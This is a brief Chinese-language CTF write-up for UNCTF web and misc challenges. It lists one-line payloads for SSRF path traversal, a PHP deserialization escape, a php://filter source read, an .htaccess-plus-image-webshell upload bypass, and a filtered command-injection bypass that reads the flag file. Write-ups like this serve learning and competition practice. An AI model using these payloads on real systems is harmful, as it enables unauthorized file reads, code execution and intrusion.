UNCTF writeup（web/misc）

web

web一共六题= =我好菜

easy_ssrf

payload:?url=unctf.com/…/…/…/…/flag

easy_unserialize

payload:1=“challengechallengechallengechallengechallengechallengechallengechallenge”;s:8:“password”;s:4:“easy”;}aaa

babyeval

一顿乱搞 感觉自己写的很麻烦 记得看别人的wp
payload:?a=?>&1=php://filter/read=convert.base64-encode/resource=flag.php
得到base64编码的flag 解码即可

ezphp

easy_upload

先上传.hatccess文件 里面用换行符绕过php 之后上传图片马

UN’s online tools

用|命令绕过 ls一下发现index.php和style.css最后1|ca\t%09/fla?拿到flag

Misc

misc只有四题= =还都是签到题 pan神切misc切太快了 刚碰到个有思路的 pan神已经切了 tql%%%

baby_is_you

签到 winhex打开 拉到最下面 打开bilibili

爷的历险记

非预期解 /UNCTF2020/www/data/Items 即可获取flag

阴阳人编码

Ook加密

被删除的flag

winhex打开 搜索unctf即可